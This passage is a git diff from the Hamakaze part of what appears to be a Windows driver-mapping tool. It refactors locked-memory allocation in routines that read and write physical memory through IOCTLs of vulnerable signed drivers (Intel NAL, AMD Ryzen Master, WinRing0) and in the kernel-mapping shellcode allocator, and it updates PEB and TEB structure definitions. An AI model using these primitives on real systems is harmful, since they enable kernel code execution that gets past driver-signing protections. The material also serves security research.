- if (lockedBuffer) {
-
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_READWRITE);
- ULONG_PTR physicalAddress, newVirt;
+ if (lockedBuffer) {
- if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) {
- if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) {
+ ULONG_PTR physicalAddress, newVirt;
- bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes);
- if (bResult) {
- RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
- }
- else {
- dwError = GetLastError();
- }
+ if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) {
+ if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) {
- NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes);
+ bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes);
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
}
- }
- else {
- dwError = GetLastError();
- }
- VirtualUnlock(lockedBuffer, NumberOfBytes);
+ NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes);
+ }
}
else {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
diff --git a/Source/Hamakaze/idrv/ryzen.cpp b/Source/Hamakaze/idrv/ryzen.cpp
index 742e9aa..00e8c8c 100644
--- a/Source/Hamakaze/idrv/ryzen.cpp
+++ b/Source/Hamakaze/idrv/ryzen.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 07 Apr 2023
+* DATE: 14 Apr 2023
*
* AMD Ryzen Master Service Driver routines.
*
@@ -64,37 +64,32 @@ BOOL WINAPI RmReadPhysicalMemory(
SIZE_T size;
size = sizeof(RMDRV_REQUEST) + NumberOfBytes;
- pRequest = (RMDRV_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (RMDRV_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_AMDRM_READ_MEMORY,
+ pRequest,
+ sizeof(RMDRV_REQUEST),
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_AMDRM_READ_MEMORY,
- pRequest,
- sizeof(RMDRV_REQUEST),
- pRequest,
- (ULONG)size);
+ if (bResult) {
- if (bResult) {
-
- RtlCopyMemory(
- Buffer,
- RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
- NumberOfBytes);
-
- }
+ RtlCopyMemory(
+ Buffer,
+ RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
+ NumberOfBytes);
- VirtualUnlock(pRequest, size);
}
- VirtualFree(pRequest, 0, MEM_RELEASE);
-
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
@@ -120,33 +115,28 @@ BOOL WINAPI RmWritePhysicalMemory(
size = sizeof(RMDRV_REQUEST) + NumberOfBytes;
- pRequest = (RMDRV_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (RMDRV_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
- RtlCopyMemory(
- RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
- Buffer,
- NumberOfBytes);
-
- bResult = supCallDriver(DeviceHandle,
- IOCTL_AMDRM_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
+ RtlCopyMemory(
+ RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
+ Buffer,
+ NumberOfBytes);
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_AMDRM_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/winio.cpp b/Source/Hamakaze/idrv/winio.cpp
index 5951198..3992529 100644
--- a/Source/Hamakaze/idrv/winio.cpp
+++ b/Source/Hamakaze/idrv/winio.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: WINIO.CPP
*
-* VERSION: 1.27
+* VERSION: 1.31
*
-* DATE: 11 Nov 2022
+* DATE: 14 Apr 2023
*
* WINIO based drivers routines.
*
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index 608a4f6..99743c3 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -4,9 +4,9 @@
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.30
+* VERSION: 1.31
*
-* DATE: 20 Mar 2023
+* DATE: 14 Apr 2023
*
* WinRing0 based drivers routines.
*
@@ -20,6 +20,13 @@
#include "global.h"
#include "idrv/winring0.h"
+//
+// WARNING, (BUG)FEATURE ALERT
+//
+// WinRing0 crapware does not check API call results.
+// This will eventually lead to BSOD in case of mapping failure.
+//
+
/*
* WRZeroReadPhysicalMemory
*
@@ -72,34 +79,28 @@ BOOL WINAPI WRZeroWritePhysicalMemory(
value = FIELD_OFFSET(OLS_WRITE_MEMORY_INPUT, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (OLS_WRITE_MEMORY_INPUT*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (OLS_WRITE_MEMORY_INPUT*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->Address.QuadPart = PhysicalAddress;
- pRequest->UnitSize = 1;
- pRequest->Count = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ pRequest->Address.QuadPart = PhysicalAddress;
+ pRequest->UnitSize = 1;
+ pRequest->Count = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_OLS_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- if (!bResult)
- dwError = GetLastError();
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_OLS_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- VirtualUnlock(pRequest, size);
- }
- else {
+ if (!bResult)
dwError = GetLastError();
- }
- VirtualFree(pRequest, 0, MEM_RELEASE);
+
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
diff --git a/Source/Hamakaze/shellcode.cpp b/Source/Hamakaze/shellcode.cpp
index 44083ea..db0fbc8 100644
--- a/Source/Hamakaze/shellcode.cpp
+++ b/Source/Hamakaze/shellcode.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 09 Apr 2023
+* DATE: 14 Apr 2023
*
* Default driver mapping shellcode(s) implementation.
*
@@ -1752,8 +1752,7 @@ VOID ScFree(
_In_ ULONG ScSize
)
{
- VirtualUnlock(ScBuffer, ScSize);
- VirtualFree(ScBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(ScBuffer, ScSize);
}
/*
@@ -1850,18 +1849,13 @@ PVOID ScAllocate(
#endif
}
- pvShellCode = (SHELLCODE*)VirtualAlloc(NULL, scSize,
+ pvShellCode = (SHELLCODE*)supAllocateLockedMemory(scSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
return NULL;
- if (!VirtualLock(pvShellCode, scSize)) {
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
- return NULL;
- }
-
pvBootstrap = pvShellCode->BootstrapCode;
switch (ShellVersion) {
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index 522a9a1..68c1754 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 08 Apr 2023
+* DATE: 14 Apr 2023
*
* Program global support routines.
*
@@ -48,6 +48,71 @@ BOOL FORCEINLINE supHeapFree(
return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
}
+/*
+* supAllocateLockedMemory
+*
+* Purpose:
+*
+* Wrapper for VirtualAllocEx+VirtualLock.
+*
+*/
+PVOID supAllocateLockedMemory(
+ _In_ SIZE_T Size,
+ _In_ ULONG AllocationType,
+ _In_ ULONG Protect
+)
+{
+ PVOID Buffer = NULL;
+
+ Buffer = VirtualAllocEx(NtCurrentProcess(),
+ NULL,
+ Size,
+ AllocationType,
+ Protect);
+
+ if (Buffer) {
+
+ if (!VirtualLock(Buffer, Size)) {
+
+ VirtualFreeEx(NtCurrentProcess(),
+ Buffer,
+ 0,
+ MEM_RELEASE);
+
+ Buffer = NULL;
+
+ }
+
+ }
+
+ return Buffer;
+}
+
+/*
+* supFreeLockedMemory
+*
+* Purpose:
+*
+* Wrapper for VirtualUnlock + VirtualFreeEx.
+*
+*/
+BOOL supFreeLockedMemory(
+ _In_ PVOID Memory,
+ _In_ SIZE_T LockedSize
+)
+{
+ if (VirtualUnlock(Memory, LockedSize)) {
+
+ return VirtualFreeEx(NtCurrentProcess(),
+ Memory,
+ 0,
+ MEM_RELEASE);
+
+ }
+
+ return FALSE;
+}
+
/*
* supCallDriverEx
*
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index bfc69b1..3b96aa7 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -113,6 +113,15 @@ PVOID FORCEINLINE supHeapAlloc(
BOOL FORCEINLINE supHeapFree(
_In_ PVOID Memory);
+PVOID supAllocateLockedMemory(
+ _In_ SIZE_T Size,
+ _In_ ULONG AllocationType,
+ _In_ ULONG Protect);
+
+BOOL supFreeLockedMemory(
+ _In_ PVOID Memory,
+ _In_ SIZE_T LockedSize);
+
PVOID supMapPhysicalMemory(
_In_ HANDLE SectionHandle,
_In_ ULONG_PTR PhysicalAddress,
diff --git a/Source/Shared/ntos/ntbuilds.h b/Source/Shared/ntos/ntbuilds.h
index c7c5d8d..62316ed 100644
--- a/Source/Shared/ntos/ntbuilds.h
+++ b/Source/Shared/ntos/ntbuilds.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2021 - 2022
+* (C) COPYRIGHT AUTHORS, 2021 - 2023
*
* TITLE: NTBUILDS.H
*
-* VERSION: 1.13
+* VERSION: 1.15
*
-* DATE: 16 Oct 2022
+* DATE: 11 Apr 2023
*
* Windows NT builds definition file.
*
@@ -86,4 +86,4 @@
#define NT_WIN11_22H2 22621
// Windows 11 Active Develepment Branch (23H2)
-#define NTX_WIN11_ADB 25217
+#define NTX_WIN11_ADB 25330
diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h
index f985a2c..7d0bcb8 100644
--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -5,9 +5,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.207
+* VERSION: 1.210
*
-* DATE: 01 Apr 2023
+* DATE: 11 Apr 2023
*
* Common header file for the ntos API functions and definitions.
*
@@ -6049,6 +6049,9 @@ typedef struct _GDI_SHARED_MEMORY {
#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
#endif
+typedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;
+typedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;
+
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
@@ -6099,17 +6102,20 @@ typedef struct _RTL_USER_PROCESS_PARAMETERS {
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
- ULONG EnvironmentSize;
- ULONG EnvironmentVersion;
- PVOID PackageDependencyData; //8+
+ ULONG_PTR EnvironmentSize;
+ ULONG_PTR EnvironmentVersion;
+
+ PVOID PackageDependencyData;
ULONG ProcessGroupId;
- // ULONG LoaderThreads;
- // UNICODE_STRING RedirectionDllName;
- // UNICODE_STRING HeapPartitionName;
- // ULONGLONG* DefaultThreadpoolCpuSetMasks;
- // ULONG DefaultThreadpoolCpuSetMaskCount;
- // ULONG DefaultThreadpoolThreadMaximum;
-} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+ ULONG LoaderThreads;
+
+ UNICODE_STRING RedirectionDllName; // RS4
+ UNICODE_STRING HeapPartitionName; // 19H1
+ ULONG_PTR DefaultThreadpoolCpuSetMasks;
+ ULONG DefaultThreadpoolCpuSetMaskCount;
+ ULONG DefaultThreadpoolThreadMaximum;
+ ULONG HeapMemoryTypeMask; // WIN11
+} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
@@ -6130,6 +6136,7 @@ typedef struct _PEB {
BOOLEAN IsLongPathAwareProcess : 1;
};
};
+
HANDLE Mutant;
PVOID ImageBaseAddress;
@@ -6138,8 +6145,9 @@ typedef struct _PEB {
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
- PVOID AtlThunkSListPtr;
+ PSLIST_HEADER AtlThunkSListPtr;
PVOID IFEOKey;
+
union
{
ULONG CrossProcessFlags;
@@ -6152,25 +6160,26 @@ typedef struct _PEB {
ULONG ProcessUsingFTH : 1;
ULONG ProcessPreviouslyThrottled : 1;
ULONG ProcessCurrentlyThrottled : 1;
- ULONG ProcessImagesHotPatched : 1;
+ ULONG ProcessImagesHotPatched : 1; // RS5
ULONG ReservedBits0 : 24;
};
- ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
- ULONG SystemReserved[1];
+ ULONG SystemReserved;
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
+
PVOID ReadOnlySharedMemoryBase;
- PVOID HotpatchInformation;
- PVOID *ReadOnlyStaticServerData;
+ struct _SILO_USER_SHARED_DATA* SharedData;
+ PVOID* ReadOnlyStaticServerData;
+
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
@@ -6178,7 +6187,7 @@ typedef struct _PEB {
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
- LARGE_INTEGER CriticalSectionTimeout;
+ ULARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
@@ -6186,7 +6195,7 @@ typedef struct _PEB {
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
- PVOID *ProcessHeaps;
+ PVOID* ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
@@ -6202,7 +6211,7 @@ typedef struct _PEB {
ULONG ImageSubsystem;
ULONG ImageSubsystemMajorVersion;
ULONG ImageSubsystemMinorVersion;
- ULONG_PTR ImageProcessAffinityMask;
+ KAFFINITY ActiveProcessAffinityMask;
GDI_HANDLE_BUFFER GdiHandleBuffer;
PVOID PostProcessInitRoutine;
@@ -6218,22 +6227,35 @@ typedef struct _PEB {
UNICODE_STRING CSDVersion;
- PVOID ActivationContextData;
- PVOID ProcessAssemblyStorageMap;
- PVOID SystemDefaultActivationContextData;
- PVOID SystemAssemblyStorageMap;
+ PACTIVATION_CONTEXT_DATA ActivationContextData;
+ PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;
+ PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;
+ PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;
SIZE_T MinimumStackCommit;
- PVOID *FlsCallback;
- LIST_ENTRY FlsListHead;
- PVOID FlsBitmap;
- ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
- ULONG FlsHighIndex;
+ PVOID SparePointers[2];
+ PVOID PatchLoaderData;
+ PVOID ChpeV2ProcessInfo;
+
+ ULONG AppModelFeatureState;
+ ULONG SpareUlongs[2];
+
+ USHORT ActiveCodePage;
+ USHORT OemCodePage;
+ USHORT UseCaseMapping;
+ USHORT UnusedNlsField;
PVOID WerRegistrationData;
PVOID WerShipAssertPtr;
- PVOID pContextData;
+
+ union
+ {
+ PVOID pContextData;
+ PVOID pUnused;
+ PVOID EcCodeBitMap;
+ };
+
PVOID pImageHeaderHash;
union
{
@@ -6247,27 +6269,27 @@ typedef struct _PEB {
};
};
ULONGLONG CsrServerReadOnlySharedMemoryBase;
- //ULONGLONG TppWorkerpListLock;
- //LIST_ENTRY TppWorkerpList;
- //PVOID WaitOnAddressHashTable[128];
- //PVOID TelemetryCoverageHeader;
- //ULONG CloudFileFlags;
- //ULONG CloudFileDiagFlags;
- //CHAR PlaceholderCompatibilityMode;
- //CHAR PlaceholderCompatibilityModeReserved[7];
- //struct _LEAP_SECOND_DATA* LeapSecondData;
- //union
- //{
- // ULONG LeapSecondFlags;
- // struct
- // {
- // ULONG SixtySecondEnabled : 1;
- // ULONG Reserved : 31;
- // };
- //};
- //ULONG NtGlobalFlag2;
- //ULONG64 ExtendedFeatureDisableMask;
-} PEB, *PPEB;
+ PRTL_CRITICAL_SECTION TppWorkerpListLock;
+ LIST_ENTRY TppWorkerpList;
+ PVOID WaitOnAddressHashTable[128];
+ PVOID TelemetryCoverageHeader; // RS3
+ ULONG CloudFileFlags;
+ ULONG CloudFileDiagFlags; // RS4
+ CHAR PlaceholderCompatibilityMode;
+ CHAR PlaceholderCompatibilityModeReserved[7];
+ struct _LEAP_SECOND_DATA* LeapSecondData; // RS5
+ union
+ {
+ ULONG LeapSecondFlags;
+ struct
+ {
+ ULONG SixtySecondEnabled : 1;
+ ULONG Reserved : 31;
+ };
+ };
+ ULONG NtGlobalFlag2;
+ ULONGLONG ExtendedFeatureDisableMask; // since WIN11
+} PEB, * PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
@@ -6289,6 +6311,64 @@ typedef struct _GDI_TEB_BATCH {
ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
+typedef struct _ACTIVATION_CONTEXT_DATA {
+ ULONG Magic;
+ ULONG HeaderSize;
+ ULONG FormatVersion;
+ ULONG TotalSize;
+ ULONG DefaultTocOffset;
+ ULONG ExtendedTocOffset;
+ ULONG AssemblyRosterOffset;
+ ULONG Flags;
+} ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;
+
+typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {
+ ULONG Flags;
+ UNICODE_STRING DosPath;
+ HANDLE Handle;
+} ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;
+
+typedef struct _ASSEMBLY_STORAGE_MAP {
+ ULONG Flags;
+ ULONG AssemblyCount;
+ PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;
+} ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;
+
+typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(
+ _In_ ULONG NotificationType,
+ _In_ struct _ACTIVATION_CONTEXT* ActivationContext,
+ _In_ PACTIVATION_CONTEXT_DATA ActivationContextData,
+ _In_opt_ PVOID NotificationContext,
+ _In_opt_ PVOID NotificationData,
+ _Inout_ PBOOLEAN DisableThisNotification
+ );
+
+typedef struct _ACTIVATION_CONTEXT {
+ LONG RefCount;
+ ULONG Flags;
+ PACTIVATION_CONTEXT_DATA ActivationContextData;
+ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;
+ PVOID NotificationContext;
+ ULONG SentNotifications[8];
+ ULONG DisabledNotifications[8];
+ ASSEMBLY_STORAGE_MAP StorageMap;
+ PASSEMBLY_STORAGE_MAP_ENTRY InlineStorageMapEntries[32];
+} ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+ struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+ PACTIVATION_CONTEXT ActivationContext;
+ ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+ PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+ LIST_ENTRY FrameListCache;
+ ULONG Flags;
+ ULONG NextCookieSequenceNumber;
+ ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
typedef struct _TEB {
NT_TIB NtTib;
@@ -6307,16 +6387,39 @@ typedef struct _TEB {
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
- PVOID SystemReserved1[54];
- NTSTATUS ExceptionCode;
- PVOID ActivationContextStackPointer;
-#if defined(_M_X64)
- UCHAR SpareBytes[24];
+ PVOID ReservedForDebuggerInstrumentation[16];
+#ifdef _WIN64
+ PVOID SystemReserved1[30];
#else
- UCHAR SpareBytes[36];
+ PVOID SystemReserved1[26];
#endif
+
+ CHAR PlaceholderCompatibilityMode;
+ BOOLEAN PlaceholderHydrationAlwaysExplicit;
+ CHAR PlaceholderReserved[10];
+
+ ULONG ProxiedProcessId;
+ ACTIVATION_CONTEXT_STACK ActivationStack;
+
+ UCHAR WorkingOnBehalfTicket[8];
+ NTSTATUS ExceptionCode;
+
+ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+ ULONG_PTR InstrumentationCallbackSp;
+ ULONG_PTR InstrumentationCallbackPreviousPc;
+ ULONG_PTR InstrumentationCallbackPreviousSp;
+#ifdef _WIN64
ULONG TxFsContext;
+#endif
+ BOOLEAN InstrumentationCallbackDisabled;
+#ifdef _WIN64
+ BOOLEAN UnalignedLoadStoreExceptions;
+#endif
+#ifndef _WIN64
+ UCHAR SpareBytes[23];
+ ULONG TxFsContext;
+#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
HANDLE GdiCachedProcessHandle;
@@ -6346,7 +6449,7 @@ typedef struct _TEB {
PVOID DbgSsReserved[2];
ULONG HardErrorMode;
-#if defined(_M_X64)
+#ifdef _WIN64
PVOID Instrumentation[11];
#else
PVOID Instrumentation[9];
@@ -6354,7 +6457,7 @@ typedef struct _TEB {
GUID ActivityId;
PVOID SubProcessTag;
- PVOID EtwLocalData;
+ PVOID PerflibData;
PVOID EtwTraceData;
PVOID WinSockData;
ULONG GdiBatchCount;
@@ -6374,13 +6477,13 @@ typedef struct _TEB {
ULONG GuaranteedStackBytes;
PVOID ReservedForPerf;
- PVOID ReservedForOle;
+ PVOID ReservedForOle; // tagSOleTlsData
ULONG WaitingOnLoaderLock;
PVOID SavedPriorityState;
- ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR ReservedForCodeCoverage;
PVOID ThreadPoolData;
- PVOID *TlsExpansionSlots;
-#if defined(_M_X64)
+ PVOID* TlsExpansionSlots;
+#ifdef _WIN64
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
@@ -6388,7 +6491,7 @@ typedef struct _TEB {
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
- ULONG HeapVirtualAffinity;
+ ULONG HeapData;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
PVOID FlsData;
@@ -6431,16 +6534,15 @@ typedef struct _TEB {
PVOID TxnScopeExitCallback;
PVOID TxnScopeContext;
ULONG LockCount;
- ULONG SpareUlong0;
+ LONG WowTebOffset;
PVOID ResourceRetValue;
- //PVOID ReservedForWdf;
- //ULONGLONG ReservedForCrt;
- //GUID EffectiveContainerId;
- //ULONGLONG LastSleepCounter;
- //ULONG SpinCallCount;
- //UCHAR Padding8[4];
- //ULONGLONG ExtendedFeatureDisableMask;
-} TEB, *PTEB;
+ PVOID ReservedForWdf;
+ ULONGLONG ReservedForCrt;
+ GUID EffectiveContainerId;
+ ULONGLONG LastSleepCounter;
+ ULONG SpinCallCount;
+ ULONGLONG ExtendedFeatureDisableMask;
+} TEB, * PTEB;
typedef struct _PROCESS_DEVICEMAP_INFORMATION {
union {